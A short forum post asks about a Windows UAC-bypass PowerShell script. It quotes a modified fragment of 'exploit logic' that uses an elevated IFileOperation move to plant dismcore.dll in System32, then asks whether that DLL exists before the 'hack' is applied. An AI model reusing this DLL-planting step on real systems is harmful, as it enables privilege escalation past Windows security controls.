zacharygriffee

# Exploit logic if (Test-Path $($env:SystemRoot + '\System32\dismcore.dll')) { echo "[!] Already Have dismcore.dll, not moving file." } else { echo "[>] Performing elevated IFileOperation::MoveItem operation.." $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\System32\'), "dismcore.dll") $IFileOperation.PerformOperations() } At about line 1383 I just modded the ps1 at https://goo.gl/fPl4tm to whats in the code bock

Question: I'm also getting the 'replace files' dialog after the second application of this payload. I'm attempting to get rid of that 'replace files' dialog by modifying the ps1 script and putting the modified version on my web server. Since I didn't check prior to using the hack on my personal computer, the question I have is, does 'dismcore.dll' exist prior to applying this hack? Or does this hack create/spawn 'dismcore.dll' as a new dll for the system? The reason being, how I'm modifying the ps1 is that it assumes there is no dismcore.dll before the hack is applied.

I'm very much interested in this as well.